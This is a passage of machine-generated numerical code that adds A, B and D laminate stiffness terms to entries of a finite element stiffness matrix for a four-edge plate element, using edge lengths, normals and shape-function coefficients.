k0[i1*dof+0, i2*dof+4] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+0, i3*dof+0] += Ac*((A11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+0, i3*dof+1] += Ac*((A12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+0, i3*dof+3] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+0, i3*dof+4] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+0, i4*dof+0] += Ac*((A11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+0, i4*dof+1] += Ac*((A12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+0, i4*dof+3] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+0, i4*dof+4] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+1, i1*dof+0] += Ac*((A12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+1, i1*dof+1] += Ac*((A22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+1, i1*dof+3] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+1, i1*dof+4] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+1, i2*dof+0] += Ac*((A12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+1, i2*dof+1] += Ac*((A22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+1, i2*dof+3] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+1, i2*dof+4] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+1, i3*dof+0] += Ac*((A12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+1, i3*dof+1] += Ac*((A22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+1, i3*dof+3] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+1, i3*dof+4] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+1, i4*dof+0] += Ac*((A12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+1, i4*dof+1] += Ac*((A22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+1, i4*dof+3] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+1, i4*dof+4] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+3, i1*dof+0] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+3, i1*dof+1] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+3, i1*dof+3] += Ac*((D11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+3, i1*dof+4] += Ac*((D12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+3, i2*dof+0] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+3, i2*dof+1] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+3, i2*dof+3] += Ac*((D11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+3, i2*dof+4] += Ac*((D12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+3, i3*dof+0] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+3, i3*dof+1] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+3, i3*dof+3] += Ac*((D11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+3, i3*dof+4] += Ac*((D12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+3, i4*dof+0] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+3, i4*dof+1] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+3, i4*dof+3] += Ac*((D11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+3, i4*dof+4] += Ac*((D12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+4, i1*dof+0] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+4, i1*dof+1] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+4, i1*dof+3] += Ac*((D12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
